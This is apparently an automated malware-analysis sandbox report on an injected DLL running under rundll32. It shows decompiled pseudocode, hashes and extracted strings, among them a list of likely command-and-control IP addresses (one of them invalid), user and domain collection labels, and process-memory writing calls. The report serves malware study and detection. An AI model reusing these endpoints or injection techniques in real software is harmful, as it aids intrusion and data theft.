                                        • String ID: WQL
                                        • API String ID: 3361228291-1249411209
                                        • Opcode ID: 9231922dca4d2be6e7763dd26585ec52659178d3308919129ccb0289ea1da193
                                        • Instruction ID: 660bdb2ded0759f3a3f10b819eb60e0da0b6b26f7d76fb4ac8e741c5a9168553
                                        • Opcode Fuzzy Hash: 9231922dca4d2be6e7763dd26585ec52659178d3308919129ccb0289ea1da193
                                        • Instruction Fuzzy Hash: 52519E76201B4085EF15EF25E8583EE23A0FBA1B98F068526DE9A07F96CF3CC556D350
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF31288C8 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF31288C8(void* __edx, char* __r8, void* __r9) {
				signed long long _t9;
				signed long long _t10;
				void* _t15;

				_t9 =  *0xf3203000; // 0x1fc8e4a4378e
				_t10 = _t9 ^ _t15 - 0x000000c0;
				 *(_t15 - 0x4f + 0x3f) = _t10;
				if (__r9 - _t10 + 4 >= 0) goto 0xf3128914;
				 *__r8 = 0;
				E0000021E21EF310C290();
				return 0xc;
			}






                                        0x21ef31288d6
                                        0x21ef31288dd
                                        0x21ef31288e0
                                        0x21ef31288f4
                                        0x21ef31288f6
                                        0x21ef3128906
                                        0x21ef3128913

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                        • API String ID: 3215553584-2617248754
                                        • Opcode ID: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction ID: 696883b6c42c800d2ea3339d84f7eeb87cfa6d8ea5fa8815c224639d9e18fdad
                                        • Opcode Fuzzy Hash: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction Fuzzy Hash: 64416672601B4489EF14CF65EC457CE33F8E728798F42452AAE9C47B95EA38C12AC340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302A110 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 95libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
                                        • String ID: Service-0x$_OPENSSL_isservice
                                        • API String ID: 459917433-1672312481
                                        • Opcode ID: 4e86c7adac69599f6ce400253259397c15a7042e90f1d57d68cc194ce68e08f3
                                        • Instruction ID: 2c2fef7057a79fd65c52ac304f28f6b5b8d807c844746d2540f2a931d53d2e3d
                                        • Opcode Fuzzy Hash: 4e86c7adac69599f6ce400253259397c15a7042e90f1d57d68cc194ce68e08f3
                                        • Instruction Fuzzy Hash: 21411E72201B409AEF608F69EC487DA22A4FB69BB4F464725AD6D46FE4DF2CC156C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3017E30 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 66libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModuleProtectVirtual
                                        • String ID: SleepEx$UD3"$WriteProcessMemory$kernel32.dll
                                        • API String ID: 2492872976-2122506030
                                        • Opcode ID: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction ID: 42b2de8c478d776aa2908350e501d6ebaabfde51f63380f1f59c9cc83b1896e5
                                        • Opcode Fuzzy Hash: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction Fuzzy Hash: 51214776B01A408AEB20DF66E8082DE3BB4F369BD8F454125DE4C17B48DF38C696CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF2E90 Relevance: 15.1, APIs: 10, Instructions: 93networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FF2E90(long long __rax, long long __rbx, void* __rcx, signed char* __rdx, long long __rsi, long long __rbp, intOrPtr* __r9, intOrPtr _a8, long long _a16, long long _a24, long long _a32) {
				long long _v32;
				intOrPtr _v40;
				intOrPtr _v56;
				void* _t22;
				void* _t24;
				intOrPtr _t25;
				void* _t27;
				intOrPtr _t28;
				void* _t39;
				long long _t50;
				void* _t73;

				_t60 = __rdx;
				_t50 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				r15d = 0;
				_t73 = __rcx;
				if (__rcx == 0xffffffff) goto 0xf2ff2fc6;
				if (r8b == 0) goto 0xf2ff2f18;
				if (( *__rdx & 0x00000008) == 0) goto 0xf2ff2f18;
				_a8 = r15d;
				_t22 = E0000021E21EF310D880(__rcx, __rdx);
				 *__rdx =  *__rdx | 0x00000008;
				__imp__#112();
				_v56 = 4;
				r8d = 0x80;
				__imp__#21();
				E0000021E21EF310D880(_t73, __rdx);
				__imp__#111();
				if (_t22 != 0) goto 0xf2ff2f18;
				_t24 = E0000021E21EF310D880(_t73, __rdx);
				__imp__#112();
				__imp__#3();
				_t25 = E0000021E21EF310D880(_t73, __rdx);
				__imp__#111();
				_v32 = _t50;
				_v40 = _t25;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [edi], xmm0");
				if (_t24 == 0) goto 0xf2ff2fc6;
				E0000021E21EF310D880(_t73, _t60);
				if ( *((intOrPtr*)(__r9 + 8)) != _t50) goto 0xf2ff2f61;
				if ( *__r9 == 0x2733) goto 0xf2ff2f74;
				_t27 = E0000021E21EF310D880(_t73, _t60);
				if ( *((intOrPtr*)(__r9 + 8)) != _t50) goto 0xf2ff2fc2;
				if ( *__r9 != 0x4d5) goto 0xf2ff2fc2;
				_a8 = r15d;
				__imp__#10();
				 *__rdx =  *__rdx & 0x000000fc;
				__imp__#112();
				__imp__#3();
				_t39 = _t27;
				_t28 = E0000021E21EF310D880(_t73, _t60);
				__imp__#111();
				_v40 = _t28;
				_v32 = _t50;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [edi], xmm0");
				if (_t39 != 0) goto 0xf2ff2fdd;
				_v40 = r15d;
				E0000021E21EF310D880(_t73, _t60);
				_v32 = _t50;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [edi], xmm0");
				return _t39;
			}














                                        0x21ef2ff2e90
                                        0x21ef2ff2e90
                                        0x21ef2ff2e90
                                        0x21ef2ff2e95
                                        0x21ef2ff2e9a
                                        0x21ef2ff2ea8
                                        0x21ef2ff2eb1
                                        0x21ef2ff2ebb
                                        0x21ef2ff2ec4
                                        0x21ef2ff2ec9
                                        0x21ef2ff2ecb
                                        0x21ef2ff2ed0
                                        0x21ef2ff2ed5
                                        0x21ef2ff2edb
                                        0x21ef2ff2ee6
                                        0x21ef2ff2ef3
                                        0x21ef2ff2efc
                                        0x21ef2ff2f04
                                        0x21ef2ff2f09
                                        0x21ef2ff2f11
                                        0x21ef2ff2f13
                                        0x21ef2ff2f1a
                                        0x21ef2ff2f23
                                        0x21ef2ff2f2b
                                        0x21ef2ff2f33
                                        0x21ef2ff2f39
                                        0x21ef2ff2f3e
                                        0x21ef2ff2f42
                                        0x21ef2ff2f47
                                        0x21ef2ff2f4c
                                        0x21ef2ff2f4e
                                        0x21ef2ff2f57
                                        0x21ef2ff2f5f
                                        0x21ef2ff2f61
                                        0x21ef2ff2f6a
                                        0x21ef2ff2f72
                                        0x21ef2ff2f79
                                        0x21ef2ff2f86
                                        0x21ef2ff2f8c
                                        0x21ef2ff2f92
                                        0x21ef2ff2f9b
                                        0x21ef2ff2fa1
                                        0x21ef2ff2fa3
                                        0x21ef2ff2fab
                                        0x21ef2ff2fb1
                                        0x21ef2ff2fb5
                                        0x21ef2ff2fba
                                        0x21ef2ff2fbf
                                        0x21ef2ff2fc4
                                        0x21ef2ff2fc6
                                        0x21ef2ff2fcb
                                        0x21ef2ff2fd0
                                        0x21ef2ff2fd5
                                        0x21ef2ff2fda
                                        0x21ef2ff2ff7

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$closesocket$Init_thread_footerioctlsocketsetsockopt
                                        • String ID:
                                        • API String ID: 3470671040-0
                                        • Opcode ID: 4a7f87fcfa628e80ead2c25a86efed27439d37b1bad46eb5c22b02626f9d8649
                                        • Instruction ID: 3bdb468ae1c8d62f32a4a4c6ca8e1fd7c5b9b793deff24c312e0daf025cdf6e0
                                        • Opcode Fuzzy Hash: 4a7f87fcfa628e80ead2c25a86efed27439d37b1bad46eb5c22b02626f9d8649
                                        • Instruction Fuzzy Hash: 4A41E272624B8182EF505F20FD4929E62E0F7A5760F068215EE8552EE9DF3CC4A6C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE92D1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 282COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitHandleProcessUninitialize
                                        • String ID: 282.19.133.12:443,91.122.18.192:443,185.156.172.62:443,72.123.65.11:443,149.255.35.167:443,172.241.27.146:443$444$Domain name: $User name:
                                        • API String ID: 935808947-1965907867
                                        • Opcode ID: 55953c7f942f71cc36cadd902deb5d5095635cb10c7a61e2f83a196a8b193266
                                        • Instruction ID: b2df30506223c6c2747eab22b42476219f344001664a94f420f357aeac71b492
                                        • Opcode Fuzzy Hash: 55953c7f942f71cc36cadd902deb5d5095635cb10c7a61e2f83a196a8b193266
                                        • Instruction Fuzzy Hash: 79D1BC33221BC689EF21EB64DC483DE23A5E760758F4106169E1A16FDADF78C686C390
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3003DD0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 66%
                                        			E0000021E21EF3003DD0(void* __ebx, void* __ecx, void* __edx, long long __rbx, intOrPtr* __rcx, long long* __rdx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				long long _t84;
				long long _t93;
				long long* _t98;
				intOrPtr _t101;
				long long _t117;
				void* _t126;
				long long _t129;
				void* _t130;
				long long _t131;
				intOrPtr* _t132;
				intOrPtr _t134;
				void* _t135;
				void* _t137;
				long long* _t142;
				long long _t145;

				_t65 = __edx;
				_t64 = __ecx;
				_t63 = __ebx;
				 *((long long*)(_t135 + 0x48)) = 0xfffffffe;
				 *((long long*)(_t135 + 0x168)) = __rbx;
				_t131 = __r8;
				_t142 = __rdx;
				_t98 = __rcx;
				_t101 =  *((intOrPtr*)(__rcx + 0x20));
				_t129 =  *((intOrPtr*)(__rcx + 0x10));
				if (__r8 - _t101 - _t129 > 0) goto 0xf3003e20;
				 *((long long*)(__rcx + 0x18)) = _t129 + __r8;
				 *__rdx = _t129;
				 *((long long*)(__rdx + 8)) = __r8;
				goto 0xf3003fea;
				_t130 = _t129 -  *((intOrPtr*)(__rcx + 8));
				if (__r8 - _t101 -  *__rcx - _t130 > 0) goto 0xf3003e5d;
				if (_t130 == 0) goto 0xf3003e45;
				_t137 = _t130;
				E0000021E21EF310DC90(__ecx, _t66, _t67, _t68,  *__rcx,  *((intOrPtr*)(__rcx + 8)), _t130, __r8, _t137);
				_t84 =  *_t98;
				 *((long long*)(_t98 + 8)) = _t84;
				 *((long long*)(_t98 + 0x18)) = _t84 + _t130 + __r8;
				goto 0xf3003fdf;
				_t132 = _t98 + 0x28;
				if (__r8 -  *_t132 - _t130 <= 0) goto 0xf3003f22;
				 *((long long*)(_t135 + 0x20)) = 0xf319d200;
				 *((long long*)(_t135 + 0x28)) = 0xf319d200;
				 *((long long*)(_t135 + 0x30)) = 0xf319d200;
				 *((long long*)(_t135 + 0x38)) = "basic_flat_buffer overflow";
				 *((char*)(_t135 + 0x40)) = 1;
				E0000021E21EF310E0E4(_t98, _t135 + 0x38, _t135 + 0x28, _t130, __r8);
				 *((long long*)(_t135 + 0x20)) = 0xf319d240;
				 *((long long*)(_t135 + 0x20)) = 0xf319d270;
				E0000021E21EF2FFE350(_t98, _t135 + 0xa8, _t135 + 0x20);
				 *0x21EF319D298 = "class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)";
				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/flat_buffer.ipp";
				 *0x21EF319D2A8 = 0x105;
				E0000021E21EF30012E0(0xf319d270, _t135 + 0xe8);
				E0000021E21EF3001320(_t63, _t98, _t135 + 0x50, 0xf319d270, _t131);
				E0000021E21EF31103EC(_t98, _t135 + 0x50, 0xf31e4b98, _t131);
				 *((long long*)(_t135 + 0x160)) = _t130 + _t137;
				 *((long long*)(_t135 + 0x170)) = _t130 + _t130;
				_t126 =  >=  ? _t135 + 0x170 : _t135 + 0x160;
				_t93 =  *_t132;
				_t133 =  <  ? _t126 : _t132;
				_t134 =  *((intOrPtr*)( <  ? _t126 : _t132));
				if (_t134 != 0) goto 0xf3003f6a;
				r15d = 0;
				goto 0xf3003fa0;
				if (_t134 - 0x1000 < 0) goto 0xf3003f95;
				if (_t134 + 0x27 - _t134 > 0) goto 0xf3003f82;
				E0000021E21EF310A170(_t93);
				asm("int3");
				E0000021E21EF310B674(_t93, _t134 + 0x27);
				_t38 = _t93 + 0x27; // 0x27
				 *((long long*)((_t38 & 0xffffffe0) - 8)) = _t93;
				goto 0xf3003fa0;
				E0000021E21EF310B674(_t93, _t134);
				_t145 = _t93;
				if ( *_t98 == 0) goto 0xf3003fc4;
				E0000021E21EF310DC90(_t64, _t66, _t67, _t68, _t145,  *((intOrPtr*)(_t98 + 8)), _t130, _t131, _t130);
				_t62 = E0000021E21EF2FE83F0(_t64, _t65, _t98,  *_t98,  *((intOrPtr*)(_t98 + 0x20)) -  *_t98);
				 *_t98 = _t145;
				 *((long long*)(_t98 + 8)) = _t145;
				_t117 = _t145 + _t130;
				 *((long long*)(_t98 + 0x18)) = _t117 + _t131;
				 *((long long*)(_t98 + 0x20)) = _t145 + _t134;
				 *((long long*)(_t142 + 8)) = _t131;
				 *_t142 = _t117;
				 *((long long*)(_t98 + 0x10)) = _t117;
				return _t62;
			}


























                                        0x21ef3003dd0
                                        0x21ef3003dd0
                                        0x21ef3003dd0
                                        0x21ef3003ddf
                                        0x21ef3003de8
                                        0x21ef3003df0
                                        0x21ef3003df3
                                        0x21ef3003df6
                                        0x21ef3003df9
                                        0x21ef3003dfd
                                        0x21ef3003e0a
                                        0x21ef3003e10
                                        0x21ef3003e14
                                        0x21ef3003e17
                                        0x21ef3003e1b
                                        0x21ef3003e24
                                        0x21ef3003e33
                                        0x21ef3003e38
                                        0x21ef3003e3a
                                        0x21ef3003e40
                                        0x21ef3003e45
                                        0x21ef3003e48
                                        0x21ef3003e54
                                        0x21ef3003e58
                                        0x21ef3003e5d
                                        0x21ef3003e6b
                                        0x21ef3003e78
                                        0x21ef3003e7f
                                        0x21ef3003e84
                                        0x21ef3003e90
                                        0x21ef3003e95
                                        0x21ef3003ea4
                                        0x21ef3003eb1
                                        0x21ef3003ebd
                                        0x21ef3003ecf
                                        0x21ef3003edc
                                        0x21ef3003ee7
                                        0x21ef3003eeb
                                        0x21ef3003efd
                                        0x21ef3003f0b
                                        0x21ef3003f1c
                                        0x21ef3003f26
                                        0x21ef3003f32
                                        0x21ef3003f4d
                                        0x21ef3003f51
                                        0x21ef3003f58
                                        0x21ef3003f5c
                                        0x21ef3003f63
                                        0x21ef3003f65
                                        0x21ef3003f68
                                        0x21ef3003f71
                                        0x21ef3003f7a
                                        0x21ef3003f7c
                                        0x21ef3003f81
                                        0x21ef3003f82
                                        0x21ef3003f87
                                        0x21ef3003f8f
                                        0x21ef3003f93
                                        0x21ef3003f98
                                        0x21ef3003f9d
                                        0x21ef3003fa4
                                        0x21ef3003fb0
                                        0x21ef3003fbf
                                        0x21ef3003fc4
                                        0x21ef3003fc7
                                        0x21ef3003fcb
                                        0x21ef3003fd3
                                        0x21ef3003fdb
                                        0x21ef3003fdf
                                        0x21ef3003fe3
                                        0x21ef3003fe6
                                        0x21ef3004003

                                        Strings
                                        • class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64), xrefs: 0000021EF3003ED5
                                        • basic_flat_buffer overflow, xrefs: 0000021EF3003E89
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp, xrefs: 0000021EF3003EE0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp$basic_flat_buffer overflow$class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)
                                        • API String ID: 0-1740500164
                                        • Opcode ID: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction ID: fc3c3b095ffa1014dbf36041c99d235771c92b855baabd84b66a8f68c11e65f6
                                        • Opcode Fuzzy Hash: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction Fuzzy Hash: 44516E72201F8095DF21DF24E9483DA73B5F798B94F5282269E9D07B98EF38C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEFC60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TimerWaitable$CloseCreateCriticalEnterErrorExceptionHandleInit_thread_footerLastSectionThrow__std_exception_copy
                                        • String ID: timer
                                        • API String ID: 1177437407-1792073242
                                        • Opcode ID: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction ID: 4e0f079183c22e9f61eda46c18e45ed979c4fec301ddac453d8dc39db687f3ed
                                        • Opcode Fuzzy Hash: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction Fuzzy Hash: A7316E32210F8085EB649F15E8483DA73B4F7A5B90F558229DE9A47F99EF38C166C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302E960 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 129encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Certificate$ContextPropertyStore$CertificatesEnumFind
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 1407214842-2690582526
                                        • Opcode ID: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction ID: 280270f932ae7d4650d05f91caa21a29117da7a8128a88f00bcaaf23383ae975
                                        • Opcode Fuzzy Hash: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction Fuzzy Hash: 8D41C13134174086EE60DB62EC087EBA7E1ABA6BD4F468026DD4943F95EE3CD507CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3018F94 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 66%
                                        			E0000021E21EF3018F94(intOrPtr __rax, void* __rcx, char _a8, char _a16, void* _a24) {
				long long _v48;
				long long _v56;
				char _v64;
				long long _v72;
				void* __rbx;
				void* __rsi;
				void* _t29;
				intOrPtr _t51;
				intOrPtr _t52;
				long long _t53;
				intOrPtr* _t60;
				intOrPtr _t65;
				intOrPtr _t74;
				signed long long _t75;
				long long _t76;
				void* _t81;

				_t51 = __rax;
				_v72 = 0xfffffffe;
				_t81 = __rcx;
				E0000021E21EF310A29C(0,  &_a16);
				_t76 =  *0xf320b608;
				_a24 = _t76;
				_t74 =  *0xf3209c28;
				if (_t74 != 0) goto 0xf301900b;
				E0000021E21EF310A29C(0,  &_a8);
				if ( *0xf3209c28 != _t74) goto 0xf3018ffb;
				 *0xf3209c08 =  *0xf3209c08 + 1;
				 *0xf3209c28 = _t51;
				_t29 = E0000021E21EF310A31C(_t51,  &_a8);
				_t75 =  *0xf3209c28;
				_t65 =  *((intOrPtr*)(_t81 + 8));
				if (_t75 -  *((intOrPtr*)(_t65 + 0x18)) >= 0) goto 0xf301901f;
				_t52 =  *((intOrPtr*)(_t65 + 0x10));
				goto 0xf3019021;
				if ( *((intOrPtr*)(_t52 + _t75 * 8)) != 0) goto 0xf30190b1;
				if ( *((intOrPtr*)(_t65 + 0x24)) == 0) goto 0xf3019046;
				E0000021E21EF310A4F8(_t29);
				if (_t75 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0xf3019044;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0xf3019046;
				if ( *((intOrPtr*)(_t53 + _t75 * 8)) != 0) goto 0xf30190b1;
				if (_t76 == 0) goto 0xf3019055;
				goto 0xf30190b1;
				E0000021E21EF30182C8(_t76,  &_a24, _t81, _t76);
				if (_t53 != 0xffffffff) goto 0xf3019094;
				_v48 = _t53;
				_v56 = "bad cast";
				_v64 = 0xf319e1e0;
				E0000021E21EF31103EC(_t76,  &_v64, 0xf31e50b0, _t76);
				asm("int3");
				_t60 = _a24;
				 *0xf320b608 = _t60;
				 *((intOrPtr*)( *_t60 + 8))();
				return E0000021E21EF310A31C(E0000021E21EF310A4C0(0xf319e1e0, _t60),  &_a16);
			}



















                                        0x21ef3018f94
                                        0x21ef3018fa2
                                        0x21ef3018faa
                                        0x21ef3018fb3
                                        0x21ef3018fb9
                                        0x21ef3018fc0
                                        0x21ef3018fc4
                                        0x21ef3018fce
                                        0x21ef3018fd6
                                        0x21ef3018fe2
                                        0x21ef3018fec
                                        0x21ef3018ff4
                                        0x21ef3018fff
                                        0x21ef3019004
                                        0x21ef301900b
                                        0x21ef3019013
                                        0x21ef3019015
                                        0x21ef301901d
                                        0x21ef3019024
                                        0x21ef301902d
                                        0x21ef301902f
                                        0x21ef3019038
                                        0x21ef301903a
                                        0x21ef3019042
                                        0x21ef3019049
                                        0x21ef301904e
                                        0x21ef3019053
                                        0x21ef301905c
                                        0x21ef3019065
                                        0x21ef3019069
                                        0x21ef3019074
                                        0x21ef301907f
                                        0x21ef301908e
                                        0x21ef3019093
                                        0x21ef3019094
                                        0x21ef3019098
                                        0x21ef30190a5
                                        0x21ef30190c7

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                                        • String ID: bad cast
                                        • API String ID: 1824299764-3145022300
                                        • Opcode ID: b889a62ffff14c02cd46d74b7cb6db2d42dad7982d218e207c9a0e33b4fef1b8
                                        • Instruction ID: 0b05e30e919b9f55d9908cfd8ba76cd6a35b34fc7866e9bbffb9030182f527dc
                                        • Opcode Fuzzy Hash: b889a62ffff14c02cd46d74b7cb6db2d42dad7982d218e207c9a0e33b4fef1b8
                                        • Instruction Fuzzy Hash: 4F314676601A40C9FF51DB25DC482DA23B1F7A4BA4F164222DE1A47BE5DE3CC887C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE7560 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 25%
                                        			E0000021E21EF2FE7560(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, signed char** __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v272;
				intOrPtr _v292;
				long long _v304;
				char _v312;
				void* __rdi;
				signed int _t21;
				void* _t29;
				void* _t32;
				void* _t33;
				signed char** _t42;
				void* _t63;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t63 = __rcx;
				r8d = 0x128;
				_t42 = __r9;
				E0000021E21EF310E410(_t29, 0, _t32, _t33,  &_v312, __rdx, __r8, __r8);
				if ( *((long long*)(__r8 + 0x18)) - 0x10 < 0) goto 0xf2fe75a1;
				goto 0xf2fe75a4;
				_v304 = __r8;
				_v292 =  *((intOrPtr*)(__r8 + 0x10));
				if (_t42[2] == 0) goto 0xf2fe75e1;
				if (_t42[3] - 0x10 < 0) goto 0xf2fe75c1;
				asm("o16 nop [eax+eax]");
				_t21 =  *( *_t42) & 0x000000ff;
				_v272 = _t21;
				if (_t21 != 0) goto 0xf2fe75d0;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				 *((long long*)(__r8))();
				 *((long long*)(__r8))();
				if (_t63 == 0) goto 0xf2fe763b;
				0xf301ad6c();
				CloseHandle(??);
				return 1;
			}















                                        0x21ef2fe7560
                                        0x21ef2fe7565
                                        0x21ef2fe756a
                                        0x21ef2fe757d
                                        0x21ef2fe7582
                                        0x21ef2fe758d
                                        0x21ef2fe7590
                                        0x21ef2fe759a
                                        0x21ef2fe759f
                                        0x21ef2fe75a9
                                        0x21ef2fe75b1
                                        0x21ef2fe75b5
                                        0x21ef2fe75bc
                                        0x21ef2fe75c6
                                        0x21ef2fe75d0
                                        0x21ef2fe75d7
                                        0x21ef2fe75df
                                        0x21ef2fe75e8
                                        0x21ef2fe75fb
                                        0x21ef2fe760e
                                        0x21ef2fe7617
                                        0x21ef2fe761b
                                        0x21ef2fe7620
                                        0x21ef2fe762d
                                        0x21ef2fe7635
                                        0x21ef2fe7655

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleProc$CloseModule
                                        • String ID: NtResumeProcess$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 133214361-1717905385
                                        • Opcode ID: 06830f6ba741785775f7a10f9e8eb4e99d0738ace87f75eb99c8e9bc4c215570
                                        • Instruction ID: f91c01fb4ab74b810d0b3709efb8bb49f892bdae70edd8f4e8015ac30327082c
                                        • Opcode Fuzzy Hash: 06830f6ba741785775f7a10f9e8eb4e99d0738ace87f75eb99c8e9bc4c215570
                                        • Instruction Fuzzy Hash: 42215A72214B4181EF01DB12E8483DA67B0F7A9FC4F4A8062DE5987B59DF39C597C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301B9B0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0000021E21EF301B9B0(long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, char _a32) {
				void* _v24;
				char _v40;
				intOrPtr _v48;
				signed int _v56;
